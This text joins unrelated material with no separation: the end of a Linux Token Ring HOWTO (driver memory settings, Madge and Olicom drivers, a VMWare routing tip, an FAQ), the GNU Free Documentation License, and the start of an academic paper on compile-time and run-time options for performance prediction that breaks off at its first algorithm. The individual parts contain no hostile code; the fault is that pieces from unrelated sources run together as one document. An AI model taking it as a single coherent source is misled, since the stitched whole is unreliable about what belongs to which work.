The second area of memory can be sized to fit your desires; this is the area of memory where the incoming and outgoing packets are stored. The driver defaults to a 16K memory size, and the area must be placed on a 16K boundary. Good areas are: 0xd0000, 0xd4000, 0xd8000.

Once you've decided which areas of memory you are going to try, you need to add the correct line to the /etc/pcmcia/config.opts file. Configuration lines in this file take the format of:

```
module "module_name" opts "option1=opt1_value option2=opt2_value ..."
```

In our case module_name is ibmtr_cs. There are three options that can be set with the ibmtr_cs driver: mmiobase, srambase and sramsize. If they are not set they will revert to the defaults in the driver, which in 9 cases out of 10 won't work for you. sramsize rarely has to be set unless you are looking for that last little bit of performance from your adapter. So, having decided upon your values, let's say 0xd2000 for the MMIO and 0xd4000 for the shared memory, you would build a config.opts line like this:

```
module "ibmtr_cs" opts "mmiobase=0xd2000 srambase=0xd4000"
```

The pcmcia_cs package must be restarted for these new options to take effect, usually with:

```
/etc/init.d/pcmcia restart
```

or:

```
/etc/rc.d/init.d/pcmcia restart
```

depending upon which run level organization your distribution adheres to. Then just plug the adapter in and see if it works. If not, you'll just have to go back and change the values for mmiobase and srambase until you find a combination that works. Or, you can upgrade to a kernel/pcmcia_cs version that supports high memory allocation, where all this config.opts nonsense is not required and you can just happily plug your adapter in and watch it run.

### 3.1.8. Madge Supplied Drivers

Madge released version 2.31 of their driver in 1999 and 2.41 in late 2001.
Both drivers can be downloaded from the Madge (http://www.madgemkr.com) web site, and the 2.41 driver is also available from the Linux Token Ring Project (http://www.linux-tokenring.org) web site. Once the drivers have been downloaded, see the README file that comes with them for instructions on how to build and install the drivers.

The only other issue some people find with the drivers is a failure to build the tool chain, due to an incorrect version of the newt libraries. If you get a compiler error relating to newt.h, change the madge-source/include/mtok/config.h file so that the #define NEWNEWT line reads:

```
#define NEWNEWT 1
```

This will ensure the tools use the correct newt libraries during the build process. A patch is available from the Linux Token Ring Project web site for the 2.31 drivers to enable them to work with the 2.4.x kernels.

### 3.1.9. Olicom Drivers

Back when Olicom were still in business they did produce a Linux driver that does actually work. Trying to find the driver these days is a bit tough; if the ftp.olicom.com site is still up and running, the driver can be found there. The driver is a combination of GPL source code and proprietary binary low level code, and it only works with the 2.0.36 and 2.2.x kernels. It should be possible to port this driver to the 2.4.x kernels...

4. Known problems

See www.linuxtr.net for the latest greatest set of bugs. Generally speaking, the biggest problem that I've seen (with ibmtr) is that if you pull your connection from the wall, the 2.0.x series of kernels would generally not recover. This has been fixed in the latest version of ibmtr, and the driver should now recognize when the link cable has been detached.

There are some laptops that don't want to work with the Olympic Cardbus adapter; for some reason the driver never sees the open interrupt from the card.
I don't think this is a problem with the driver but with the Cardbus subsystem; for some people this problem has simply gone away with a newer kernel, and I personally have never seen it on the laptops I've used in the development of the driver (Sony Vaio Z505 and Dell Latitude CPx500).

5. VMWare and Token Ring

Thanks to Scott Russell <scottrus@raleigh.ibm.com> for this little "trick".

One of the bummers about VMWare is that if you are on a Token Ring adapter, your VMWare system can't have a real TCP/IP address. Turns out this isn't the case. Here's how to do it.

- In the info below we'll call your linux box 'linux.mycompany.biz.com'.
- Register another ip address; I'll call it 'vmware.mycompany.biz.com'.
- Make sure FORWARD_IPV4=true in your /etc/sysconfig/network file. If you have to change it, you can dynamically turn on the feature as root:

```
echo 1 > /proc/sys/net/ipv4/ip_forward
```

- Alias the second ip to the TR adapter. You end up with something like this from /sbin/ifconfig:

```
tr0     linux.mycompany.biz.com
tr0:0   vmware.mycompany.biz.com
vmnet1  192.168.0.1
```

- Make sure you can ping both ip addresses from another box. If you cannot, then the next step will not work.
- Use ipchains/iptables to redirect incoming traffic for the tr0:0 interface to your vmnet1 interface. (When I did this I only redirected specific ports from tr0:0 to vmnet1.)

Now to any outside system your 'NT' box appears to be on the Token Ring, and inbound traffic can find it as well as outbound.

6. Commonly asked Questions

Here is a collection of commonly asked questions that arise from time to time on the linux-tr mailing list. If your question isn't answered here or elsewhere in this document, feel free to ask away on the mailing list.

Q: **DHCP doesn't work with my Token Ring adapter.**

A: Certain dhcp servers and clients do not work properly with token ring drivers. This is especially true with the 2.4 kernels.
During the development of the 2.3.x series of kernels, the internal type for token ring was changed to accommodate multicast support over token ring. The solution is to upgrade your dhcp client/server to a version that supports token ring and/or the latest kernel versions.

Q: **I can't set the LAA on my adapter with ifconfig tr0 hw tr 4000DEADBEEF.**

A: Firstly, double check that your adapter/driver supports setting the LAA and that you've supplied a valid LAA. Also, most drivers will only allow this to be set before the adapter is opened onto the ring. Again, this is related to the change in the internal type for token ring in the 2.4 kernels. A patch is available from the web site for nettools that fixes this and allows the LAA to be set.

Q: **My Linux machine is on a bridged network and I'm having connectivity issues with machines beyond the bridge.**

A: The token ring source routing code in the kernel uses the spanning tree algorithm. Contact your network administrator to enable this protocol on the bridges.

Q: **Can I use a Linux machine to bridge between token ring and ethernet?**

A: The simple answer is no. Bridging different network topologies in software is incredibly complicated and, while it is possible, nobody has written the code to do it. If you must bridge, there are several manufacturers that produce hardware bridges (most notably Cisco).

Q: **OK, if I can't bridge, how do I connect my Token Ring and ethernet networks?**

A: A cheap linux box with a token ring and an ethernet adapter makes an excellent router. There is no difference between setting up a token ring/ethernet router and an ethernet/ethernet router. You can do masquerading (NAT) and filtering on the router as per usual. For more details see the Netfilter HOWTO.

A. GNU Free Documentation License

A.1. 0.
PREAMBLE The purpose of this License is to make a manual, textbook, or other written document "free" in the sense of freedom: to assure everyone the effective freedom to copy and redistribute it, with or without modifying it, either commercially or noncommercially. Secondarily, this License preserves for the author and publisher a way to get credit for their work, while not being considered responsible for modifications made by others. This License is a kind of "copyleft", which means that derivative works of the document must themselves be free in the same sense. It complements the GNU General Public License, which is a copyleft license designed for free software. We have designed this License in order to use it for manuals for free software, because free software needs free documentation: a free program should come with manuals providing the same freedoms that the software does. But this License is not limited to software manuals; it can be used for any textual work, regardless of subject matter or whether it is published as a printed book. We recommend this License principally for works whose purpose is instruction or reference. A.2. 1. APPLICABILITY AND DEFINITIONS This License applies to any manual or other work that contains a notice placed by the copyright holder saying it can be distributed under the terms of this License. The "Document", below, refers to any such manual or work. Any member of the public is a licensee, and is addressed as "you". A "Modified Version" of the Document means any work containing the Document or a portion of it, either copied verbatim, or with modifications and/or translated into another language. A "Secondary Section" is a named appendix or a front–matter section of the Document that deals exclusively with the relationship of the publishers or authors of the Document to the Document's overall subject (or to related matters) and contains nothing that could fall directly within that overall subject. 
(For example, if the Document is in part a textbook of mathematics, a Secondary Section may not explain any mathematics.) The relationship could be a matter of historical connection with the subject or with related matters, or of legal, commercial, philosophical, ethical or political position regarding them. The "Invariant Sections" are certain Secondary Sections whose titles are designated, as being those of Invariant Sections, in the notice that says that the Document is released under this License. The "Cover Texts" are certain short passages of text that are listed, as Front-Cover Texts or Back-Cover Texts, in the notice that says that the Document is released under this License. A "Transparent" copy of the Document means a machine-readable copy, represented in a format whose specification is available to the general public, whose contents can be viewed and edited directly and straightforwardly with generic text editors or (for images composed of pixels) generic paint programs or (for drawings) some widely available drawing editor, and that is suitable for input to text formatters or for automatic translation to a variety of formats suitable for input to text formatters. A copy made in an otherwise Transparent file format whose markup has been designed to thwart or discourage subsequent modification by readers is not Transparent. A copy that is not "Transparent" is called "Opaque". Examples of suitable formats for Transparent copies include plain ASCII without markup, Texinfo input format, LaTeX input format, SGML or XML using a publicly available DTD, and standard-conforming simple HTML designed for human modification. Opaque formats include PostScript, PDF, proprietary formats that can be read and edited only by proprietary word processors, SGML or XML for which the DTD and/or processing tools are not generally available, and the machine-generated HTML produced by some word processors for output purposes only.
The "Title Page" means, for a printed book, the title page itself, plus such following pages as are needed to hold, legibly, the material this License requires to appear in the title page. For works in formats which do not have any title page as such, "Title Page" means the text near the most prominent appearance of the work's title, preceding the beginning of the body of the text. A.3. 2. VERBATIM COPYING You may copy and distribute the Document in any medium, either commercially or noncommercially, provided that this License, the copyright notices, and the license notice saying this License applies to the Document are reproduced in all copies, and that you add no other conditions whatsoever to those of this License. You may not use technical measures to obstruct or control the reading or further copying of the copies you make or distribute. However, you may accept compensation in exchange for copies. If you distribute a large enough number of copies you must also follow the conditions in section 3. You may also lend copies, under the same conditions stated above, and you may publicly display copies. A.4. 3. COPYING IN QUANTITY If you publish printed copies of the Document numbering more than 100, and the Document's license notice requires Cover Texts, you must enclose the copies in covers that carry, clearly and legibly, all these Cover Texts: Front-Cover Texts on the front cover, and Back-Cover Texts on the back cover. Both covers must also clearly and legibly identify you as the publisher of these copies. The front cover must present the full title with all words of the title equally prominent and visible. You may add other material on the covers in addition. Copying with changes limited to the covers, as long as they preserve the title of the Document and satisfy these conditions, can be treated as verbatim copying in other respects.
If the required texts for either cover are too voluminous to fit legibly, you should put the first ones listed (as many as fit reasonably) on the actual cover, and continue the rest onto adjacent pages. If you publish or distribute Opaque copies of the Document numbering more than 100, you must either include a machine-readable Transparent copy along with each Opaque copy, or state in or with each Opaque copy a publicly-accessible computer-network location containing a complete Transparent copy of the Document, free of added material, which the general network-using public has access to download anonymously at no charge using public-standard network protocols. If you use the latter option, you must take reasonably prudent steps, when you begin distribution of Opaque copies in quantity, to ensure that this Transparent copy will remain thus accessible at the stated location until at least one year after the last time you distribute an Opaque copy (directly or through your agents or retailers) of that edition to the public. It is requested, but not required, that you contact the authors of the Document well before redistributing any large number of copies, to give them a chance to provide you with an updated version of the Document. A.5. 4. MODIFICATIONS You may copy and distribute a Modified Version of the Document under the conditions of sections 2 and 3 above, provided that you release the Modified Version under precisely this License, with the Modified Version filling the role of the Document, thus licensing distribution and modification of the Modified Version to whoever possesses a copy of it. In addition, you must do these things in the Modified Version: - **A.** Use in the Title Page (and on the covers, if any) a title distinct from that of the Document, and from those of previous versions (which should, if there were any, be listed in the History section of the Document).
You may use the same title as a previous version if the original publisher of that version gives permission. - **B.** List on the Title Page, as authors, one or more persons or entities responsible for authorship of the modifications in the Modified Version, together with at least five of the principal authors of the Document (all of its principal authors, if it has less than five). - **C.** State on the Title Page the name of the publisher of the Modified Version, as the publisher. - **D.** Preserve all the copyright notices of the Document. - **E.** Add an appropriate copyright notice for your modifications adjacent to the other copyright notices. - **F.** Include, immediately after the copyright notices, a license notice giving the public permission to use the Modified Version under the terms of this License, in the form shown in the Addendum below. - **G.** Preserve in that license notice the full lists of Invariant Sections and required Cover Texts given in the Document's license notice. - **H.** Include an unaltered copy of this License. - **I.** Preserve the section entitled "History", and its title, and add to it an item stating at least the title, year, new authors, and publisher of the Modified Version as given on the Title Page. If there is no section entitled "History" in the Document, create one stating the title, year, authors, and publisher of the Document as given on its Title Page, then add an item describing the Modified Version as stated in the previous sentence. - **J.** Preserve the network location, if any, given in the Document for public access to a Transparent copy of the Document, and likewise the network locations given in the Document for previous versions it was based on. These may be placed in the "History" section. You may omit a network location for a work that was published at least four years before the Document itself, or if the original publisher of the version it refers to gives permission. - **K.** In any section entitled "Acknowledgements" or "Dedications", preserve the section's title, and preserve in the section all the substance and tone of each of the contributor acknowledgements and/or dedications given therein. - **L.** Preserve all the Invariant Sections of the Document, unaltered in their text and in their titles. Section numbers or the equivalent are not considered part of the section titles. - **M.** Delete any section entitled "Endorsements". Such a section may not be included in the Modified Version. - **N.** Do not retitle any existing section as "Endorsements" or to conflict in title with any Invariant Section. If the Modified Version includes new front-matter sections or appendices that qualify as Secondary Sections and contain no material copied from the Document, you may at your option designate some or all of these sections as invariant. To do this, add their titles to the list of Invariant Sections in the Modified Version's license notice. These titles must be distinct from any other section titles.
You may add a section entitled "Endorsements", provided it contains nothing but endorsements of your Modified Version by various parties, for example, statements of peer review or that the text has been approved by an organization as the authoritative definition of a standard. You may add a passage of up to five words as a Front-Cover Text, and a passage of up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts in the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover Text may be added by (or through arrangements made by) any one entity. If the Document already includes a cover text for the same cover, previously added by you or by arrangement made by the same entity you are acting on behalf of, you may not add another; but you may replace the old one, on explicit permission from the previous publisher that added the old one. The author(s) and publisher(s) of the Document do not by this License give permission to use their names for publicity for or to assert or imply endorsement of any Modified Version. A.6. 5. COMBINING DOCUMENTS You may combine the Document with other documents released under this License, under the terms defined in section 4 above for modified versions, provided that you include in the combination all of the Invariant Sections of all of the original documents, unmodified, and list them all as Invariant Sections of your combined work in its license notice. The combined work need only contain one copy of this License, and multiple identical Invariant Sections may be replaced with a single copy. If there are multiple Invariant Sections with the same name but different contents, make the title of each such section unique by adding at the end of it, in parentheses, the name of the original author or publisher of that section if known, or else a unique number. Make the same adjustment to the section titles in the list of Invariant Sections in the license notice of the combined work.
In the combination, you must combine any sections entitled "History" in the various original documents, forming one section entitled "History"; likewise combine any sections entitled "Acknowledgements", and any sections entitled "Dedications". You must delete all sections entitled "Endorsements." A.7. 6. COLLECTIONS OF DOCUMENTS You may make a collection consisting of the Document and other documents released under this License, and replace the individual copies of this License in the various documents with a single copy that is included in the collection, provided that you follow the rules of this License for verbatim copying of each of the documents in all other respects. You may extract a single document from such a collection, and distribute it individually under this License, provided you insert a copy of this License into the extracted document, and follow this License in all other respects regarding verbatim copying of that document. A.8. 7. AGGREGATION WITH INDEPENDENT WORKS A compilation of the Document or its derivatives with other separate and independent documents or works, in or on a volume of a storage or distribution medium, does not as a whole count as a Modified Version of the Document, provided no compilation copyright is claimed for the compilation. Such a compilation is called an "aggregate", and this License does not apply to the other self-contained works thus compiled with the Document, on account of their being thus compiled, if they are not themselves derivative works of the Document. If the Cover Text requirement of section 3 is applicable to these copies of the Document, then if the Document is less than one quarter of the entire aggregate, the Document's Cover Texts may be placed on covers that surround only the Document within the aggregate. Otherwise they must appear on covers around the whole aggregate. A.9. 8. 
TRANSLATION Translation is considered a kind of modification, so you may distribute translations of the Document under the terms of section 4. Replacing Invariant Sections with translations requires special permission from their copyright holders, but you may include translations of some or all Invariant Sections in addition to the original versions of these Invariant Sections. You may include a translation of this License provided that you also include the original English version of this License. In case of a disagreement between the translation and the original English version of this License, the original English version will prevail. A.10. 9. TERMINATION You may not copy, modify, sublicense, or distribute the Document except as expressly provided for under this License. Any other attempt to copy, modify, sublicense or distribute the Document is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. A.11. 10. FUTURE REVISIONS OF THIS LICENSE The Free Software Foundation may publish new, revised versions of the GNU Free Documentation License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. See http://www.gnu.org/copyleft/. Each version of the License is given a distinguishing version number. If the Document specifies that a particular numbered version of this License "or any later version" applies to it, you have the option of following the terms and conditions either of that specified version or of any later version that has been published (not as a draft) by the Free Software Foundation. If the Document does not specify a version number of this License, you may choose any version ever published (not as a draft) by the Free Software Foundation.
The Interplay of Compile-time and Run-time Options for Performance Prediction Luc Lesoil, Mathieu Acher, Xhevahire Tërnava, Arnaud Blouin, Jean-Marc Jézéquel To cite this version: Luc Lesoil, Mathieu Acher, Xhevahire Tërnava, Arnaud Blouin, Jean-Marc Jézéquel. The Interplay of Compile-time and Run-time Options for Performance Prediction. SPLC 2021 - 25th ACM International Systems and Software Product Line Conference - Volume A, Sep 2021, Leicester, United Kingdom. pp.1-12, 10.1145/3461001.3471149. hal-03286127 HAL Id: hal-03286127 https://hal.archives-ouvertes.fr/hal-03286127 Submitted on 15 Jul 2021 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. The Interplay of Compile-time and Run-time Options for Performance Prediction Luc Lesoil, Mathieu Acher, Xhevahire Tërnava, Arnaud Blouin, Jean-Marc Jézéquel Univ Rennes, INSA Rennes, CNRS, Inria, IRISA Rennes, France firstname.last@irisa.fr ABSTRACT Many software projects are configurable through compile-time options (e.g., using ./configure) and also through run-time options (e.g., command-line parameters, fed to the software at execution time). Several works have shown how to predict the effect of run-time options on performance. However it is yet to be studied how these prediction models behave when the software is built with different compile-time options. For instance, is the best run-time configuration always the best w.r.t. the chosen compilation options?
In this paper, we investigate the effect of compile-time options on the performance distributions of 4 software systems. There are cases where the compiler layer effect is linear, which is an opportunity to generalize performance models or to tune and measure run-time performance at lower cost. We also prove there can exist an interplay by exhibiting a case where compile-time options significantly alter the performance distributions of a configurable system. CCS CONCEPTS • Software and its engineering → Software product lines; Software performance; • Computing methodologies → Machine learning. 1 INTRODUCTION An ideal software system is expected to deliver the right functionality on time, using as few resources as possible, in every possible circumstance, whatever the hardware, the operating system, the compiler, or the data fed as input. For fitting such a diversity of needs, it is increasingly common that software comes in many variants and is highly configurable through configuration options. Numerous works have studied the effects of configuration options on performance. The outcome is a performance model that can be used to predict the performance of any configuration, to find an optimal configuration, or to identify, debug, and reason about influential options of a system [19, 23, 28, 29, 38–40, 44, 49, 53, 56, 63]. There are however numerous mechanisms to implement and deliver options: configuration files, command-line parameters, feature toggles or flags, plugins, etc. A useful distinction to make is between compile-time and run-time options. On the one hand, compile-time options can be used to build a custom system that can then be executed for a variety of usages. The widely used './configure && make' is a prominent example of configuring a software project at compile-time. On the other hand, run-time options are used to parameterize the behavior of the system at load-time or during the execution.
For instance, users can set some values to command-line arguments for choosing a specific algorithm or tuning the execution time based on the particularities of a given input to process. Both compile-time and run-time options can be configured to reach specific functional and performance goals. Existing studies consider either compile-time or run-time options, but not both and the possible interplay between them. For instance, all run-time configurations are measured using a unique executable of the system, typically compiled with the default compile-time configuration (i.e., using ./configure without overriding compile-time options' values). Owing to the cost of measuring configurations, this is perfectly understandable, but it is also a threat to validity. In particular, we can question the generality of these models if we change the compile-time options when building the software system: Do compile-time options change the performance distribution of run-time configurations? If yes, to what extent? Is the best run-time configuration always the best? Are the most influential run-time options always the same whatever the compile-time options used? Can we reuse a prediction model whatever the build has been? In short: (RQ1) Do compile-time options change the performance distributions of configurable systems? In this paper we investigate the effect of compile-time options together with run-time options on the performance distributions of 4 software systems. For each of these systems, we measure a relevant performance metric for a combination of \(nb_c\) compile-time options and \(nb_r\) run-time options (yielding \(nb_c \times nb_r\) possible configurations) over a number of different inputs. We show that the compile-time options can alter the run-time performance distributions of software systems, and that it is worth tuning the compile-time options to improve their performances.
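The measurement grid this implies can be sketched in a few lines of Python; the option names and values below are purely illustrative (not the configuration spaces actually measured in the paper), but the enumeration shows how a compile-time space and a run-time space combine into \(nb_c \times nb_r\) cells:

```python
from itertools import product

# Hypothetical option spaces -- names and values are illustrative only.
compile_opts = {"disable-asm": (False, True), "lto": (False, True)}
run_opts = {"cabac": (False, True), "ref": (1, 5), "threads": (1, 4)}

def configurations(opts):
    """Enumerate all assignments of values to options (the full space)."""
    names = sorted(opts)
    return [dict(zip(names, values))
            for values in product(*(opts[n] for n in names))]

nb_c = len(configurations(compile_opts))   # 2 * 2 = 4 compile-time configs
nb_r = len(configurations(run_opts))       # 2 * 2 * 2 = 8 run-time configs

# The protocol measures performance once per cell of the nb_c x nb_r grid.
grid = [(c, r) for c in configurations(compile_opts)
               for r in configurations(run_opts)]
print(nb_c, nb_r, len(grid))
```

In the actual study each cell of this grid is additionally measured over several inputs, so the real measurement effort is \(nb_c \times nb_r\) times the number of inputs.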
We thus address a second research question: (RQ2) How to tune software performances at the compile-time level? Our contributions are as follows: • We construct a protocol and carry out an empirical study investigating the effects of compile-time options on run-time performances, for 4 software systems, various workloads, and non-functional properties; • We provide a Docker image, a dataset of measurements, as well as analysis scripts\(^1\); • We exhibit a case (namely nodeJS and its operation rate) for which the compile-time options interact with the run-time options. We also present and implement a simple case of cross-layer tuning, providing a set of configuration options (run-time & compile-time) improving the operation rate of the default configuration of nodeJS. Remainder. Section 2 discusses the motivation of this paper; Section 3 presents the experimental protocol; Section 4 evaluates and analyses the results w.r.t. this protocol; Section 5 discusses the results, their limitations and future work; Section 6 describes research works related to the topic of this paper; Section 7 details the threats to validity; Section 8 concludes our paper. \(^1\) Companion repository; Zenodo data: https://zenodo.org/record/4706963; Docker: https://hub.docker.com/r/anonymice2021/splc21 2 BACKGROUND AND MOTIVATION 2.1 Compile-time and run-time options Many software systems are highly-configurable both at compile time and at run time. For instance, './configure && make' is widely used to build a custom system, i.e., an executable binary. Considering the x264 video encoder (see Figure 1), the compile-time option '--disable-asm' can be used to disable "platform-specific assembly optimizations". There are compile-time options to activate the needed functionality (e.g., '--disable-avs'), to fit requirements related to the hardware or operating system, etc. Some of these options have a suggested impact on performance.
For the same subject system x264, it is also possible to use run-time options such as '--mbtree' and '--cabac' with possible effects on the size and encoding time. Run-time options are used to parameterize the behavior of the system at load time or during the execution. Figure 1: Cross-layer variability of x264. This paper investigates how compile-time options can affect software performances and how compile-time options interact with run-time options. Both compile-time and run-time options can be configured to reach specific functional and performance goals. Beyond x264, many projects propose these two kinds of options. A configuration option, being compile-time or run-time, can take different possible values. Boolean options have two possible values: '--activate' or '--deactivate' are typical examples of Boolean compile-time options. There are also numerical options with a range of integer or float values. Options with string values also exist and the set of possible values is usually predefined. From a terminology point of view, we consider that a compile-time (resp. run-time) configuration is an assignment of values to compile-time options (resp. run-time options). It is possible to use './configure' without setting explicit values. In this case, default values are assigned and form a default configuration. Similarly, when x264 is called, default run-time options' values are internally used and constitute a default run-time configuration. 2.2 Performance prediction Performance model. Given a software system with a set of run-time configurations, a performance model maps each run-time configuration to the performance of the system.
A performance model has many applications and use-cases [4, 19, 22–24, 28, 29, 38–40, 44, 49, 53, 56, 60, 63, 65]: optimization (tuning) and finding of the best configuration, specialization of the configuration space, understanding and debugging of the effects of configuration options, verification (e.g., non-regression testing), etc. The performance of a system, such as execution time, is usually measured using the same compiled executable (binary). In our case, we consider that the way the software is compiled is subject to variability; there are two configuration spaces. Formally, given a software system with a compile-time configuration space $C$ and a run-time configuration space $R$, a performance model is a black-box function $f: C \times R \rightarrow \mathbb{R}$ that maps each run-time configuration $r \in R$ to the performance of the system compiled with a compile-time configuration $c \in C$. The construction of a performance model consists in running the system in a fixed compile-time setting $c \in C$ on various configurations $r \in R$, and recording the resulting performance values $p = f(c, r)$. Learning performance models. Measuring all configurations of a configurable system is the most obvious path to, for example, find a well-suited configuration. It is however too costly or infeasible in practice. Machine-learning techniques address this issue by measuring only a subset of configurations (known as a sample) and then using these configurations' measurements to build a performance model capable of predicting the performance of other configurations (i.e., configurations not measured before). Research works thus follow a "sampling, measuring, learning" process [19, 22–24, 28, 29, 38–40, 44, 49, 53, 56, 60, 63, 65]. The training data for learning a performance model of a system compiled with a configuration $c \in C$ is then $D_c = \{(R^i, P^i) \mid i \in [1 \ldots n]\}$ where $n$ is the number of measurements.
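The "sampling, measuring, learning" loop can be sketched on synthetic data as follows; the performance function and the nearest-neighbour learner are invented for illustration (the works surveyed here use regressions, decision trees, or random forests instead):

```python
import random

# Synthetic ground truth: performance of a run-time configuration r,
# encoded as a tuple of four Boolean options (invented for illustration).
def true_perf(r):
    return 10.0 + 5.0 * r[0] - 2.0 * r[1] + 1.0 * r[0] * r[2]

space = [(a, b, c, d) for a in (0, 1) for b in (0, 1)
                      for c in (0, 1) for d in (0, 1)]

random.seed(0)
sample = random.sample(space, 8)               # sampling: measure only a subset
train = [(r, true_perf(r)) for r in sample]    # measuring: D_c = {(R^i, P^i)}

def predict(r):
    # learning: a toy 1-nearest-neighbour model over option assignments
    nearest = min(train, key=lambda t: sum(x != y for x, y in zip(t[0], r)))
    return nearest[1]

# Predict the configurations that were never measured.
unmeasured = [r for r in space if r not in sample]
errors = [abs(predict(r) - true_perf(r)) for r in unmeasured]
print(len(train), len(unmeasured))
```

The point of the sketch is the shape of the process, not the learner: half the space is measured, the other half is predicted from the training set $D_c$.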
Statistical learning techniques, such as linear regression [51], decision trees [48], or random forests [42], use this training set to build prediction models. Generalization and transfer. Performance prediction models pursue the goal of generalizing beyond the training distribution. A first degree of generalization is that the prediction model is accurate for unmeasured and unobserved run-time configurations – it is the focus of most previous works. However, it is not sufficient since the performance model may not generalize to the compile-time configuration space. Considering Figure 1, one can question the generalization of a performance prediction model learned with a default compile-time configuration: will this model transfer well when the software is compiled differently? 2.3 Research questions The use of different compile-time configurations may change the raw and absolute performance values, but it can also change the overall distribution of configuration measurements. Given the vast variety of possible compile-time configurations that may be considered and actually used in practice, the generalization of run-time performance should be carefully studied. We aim to address two main research questions, each coming with its hypothesis. (RQ1) Do compile-time options change the performance distributions of configurable systems? A hypothesis is that two performance models $f_1$ and $f_2$ over two compile-time configurations $c_1 \in C$ (resp. $c_2$) are somehow related and close. In its simplest form, there is a linear mapping: $f_1 = \beta f_2 + \alpha$. In this case, the performance of the whole set of run-time configurations increases or decreases; we aim to quantify this gain or loss. More complex mappings can exist since the underlying performance distributions differ. Such differences can impact the ranking of configurations and the statistical influence of options on performance.
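The linear-mapping hypothesis can be checked numerically. In the following sketch the two performance vectors are synthetic and constructed to be exactly linear, so the least-squares fit recovers the slope and intercept, and a positive slope means the ranking of run-time configurations is preserved across the two builds:

```python
# Synthetic performances of the same run-time configurations under two
# compile-time configurations c1 and c2; f1 is built as 1.8 * f2 + 2.0.
f2 = [10.0, 12.5, 9.0, 15.0, 11.0, 13.0]
f1 = [1.8 * p + 2.0 for p in f2]

# Ordinary least-squares fit of f1 = beta * f2 + alpha.
n = len(f2)
mean2 = sum(f2) / n
mean1 = sum(f1) / n
beta = (sum((x - mean2) * (y - mean1) for x, y in zip(f2, f1))
        / sum((x - mean2) ** 2 for x in f2))
alpha = mean1 - beta * mean2

# With beta > 0 the ranking of run-time configurations is unchanged,
# so the best configuration under c2 remains the best under c1.
rank_c2 = sorted(range(n), key=lambda i: f2[i])
rank_c1 = sorted(range(n), key=lambda i: f1[i])
print(round(beta, 2), round(alpha, 2), rank_c1 == rank_c2)
```

When the real measurements deviate from such a linear fit, the residuals are exactly the "more complex mappings" mentioned above, and rank changes signal an interplay between the two option layers.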
Owing to the cost of compiling and measuring configurations, we aim to characterize what configuration knowledge generalizes and whether the transfer of performance models is immediate or requires further investment. A follow-up research question is: (RQ2) How to tune software performances at the compile-time level? There are certainly compile-time options with negative or positive impacts on performance (e.g., debugging options). Hence an idea is to tune the right compile-time options to eventually select optimal run-time configurations. A hypothesis is that compile-time options interact with run-time options, which can further challenge the tuning. Depending on the relationship between performance distributions (RQ1), the tuning strategy of compile-time options may differ. 3 EXPERIMENTAL PROTOCOL To answer these research questions, we built the following experimental protocol. All the materials are freely available in the companion repository. 3.1 Selecting the subject systems The objects of this experiment are a set of open-source software systems. The selected software systems must cover various application domains to make our conclusions generalizable. As a baseline for searching for software systems, we used: 1/ research papers on performance and/or variability; 2/ the website openbenchmarking\(^2\), which conducts a large panel of benchmarks on open-source software systems; 3/ our own knowledge of popular open-source projects. We selected 4 open-source software systems, listed in Table 1. In addition, we have made sure that each system processes input data \(I\) (e.g., a performance test suite), so we can exercise the options in different and realistic scenarios. 3.1.1 nodeJS. nodeJS\(^3\) is a widely-used JavaScript execution environment (78k stars on Github) \([9, 10, 21]\). Inputs \(I\).
We execute different JavaScript programs extracted from the nodeJS benchmark test suite. Configurations \(C\) and \(R\). We manually selected compile-time options (e.g., \(v8-lite-mode\) or \(enable-lto\)) that could change the way the executable behaves. We also selected run-time options that were supposed to impact the performances according to the documentation\(^4\), like \(jitless\) or \(node-memory-debug\). Additionally, we added experimental features (e.g., \(experimental-wasm-modules\) or \(experimental-vm-modules\)). Performances \(P\). We measured the rate of operations (in operations per second) performed by the selected test suite. 3.1.2 poppler. poppler\(^5\) is a library for rendering PDF files \([27, 34]\). We focus on the poppler tool \(pdfimages\), which extracts images from PDF files\(^6\). Inputs \(I\). We tested \(pdfimages\) on a series of ten PDF files containing ten books on computer science. These books differ in their number of pages, illustration-to-text ratio, image resolutions, number of images, and size (from 0.8 MB to 40.3 MB). Configurations \(C\) and \(R\). We selected the compile-time options that select the compression algorithm to be used at run time (e.g., \(libjpeg\) vs \(openjpeg\)): those different compression algorithms may be sensitive to the selected run-time options. The run-time options we selected are related to compression formats, to maximize the potential variation impacts on performance. Performances \(P\). We systematically measured: the user time; the time needed to extract the pictures (with the tool \(time\)), in seconds; the size of the output pictures, in bytes. 3.1.3 x264. x264\(^7\) (version 0.161.3048) is a video encoder that uses the H264 format \([1, 35]\). Inputs \(I\). As input data, we selected eight videos extracted from the Youtube UGC Dataset \([68]\), having different categories (Animation video, Gaming video, etc.), different resolutions (e.g., 360p, 420p) and different sizes.
This dataset is intended for the study of the performances of compression software, which suits our case. Configurations \(C\) and \(R\). For x264, we selected compile-time options related to performance (e.g., \(enable-asm\)) or to libraries related to hardware capacities (e.g., \(disable-opencl\)). Those compile-time options may interact with run-time options linked to the different stages of video compression. Performances \(P\). We measured four different non-functional properties of x264: the time needed to encode the video (with \(time\)); the size (in bytes) of the encoded video; the \(bitrate\) (in bytes per second); the number of frames encoded per second. 3.1.4 xz. xz\(^8\) (version 5.3.1alpha) is a data compression tool that uses the \(xz\) and \(lzma\) formats \([6, 7, 37]\). Inputs \(I\). As input data we use the Silesia corpus \([12]\), which provides different types of files (e.g., binary files, text files) with various sizes w.r.t. memory. Configurations $C$ and $R$. We manually selected compile-time options that can slow down the execution of the program (e.g., disable-threads or enable-debug), to test whether these options interact with run-time options. We selected specific run-time options related to the compression level, the format of the compression (e.g., xz or lzma), and the hardware capabilities (e.g., --memory=50\% ). Performances $P$. Like with poppler, we measured the time needed to compress the file (in seconds) and the size of the encoded files (in bytes).

\(^2\)https://openbenchmarking.org \(^3\)https://nodejs.org/en/ \(^4\)https://nodejs.org/api/cli.html \(^5\)https://poppler.freedesktop.org \(^6\)https://manpages.debian.org/testing/poppler-utils/pdfimages.1.en.html \(^7\)https://www.videolan.org/developers/x264.html \(^8\)https://tukaani.org/xz/

### 3.2 Measuring performances

#### 3.2.1 Protocol For each of these systems, we measured their performances by applying the protocol detailed in Algorithm 1.
```
Algorithm 1 - Measuring performances of the chosen systems
 1: Input $S$ a configurable system
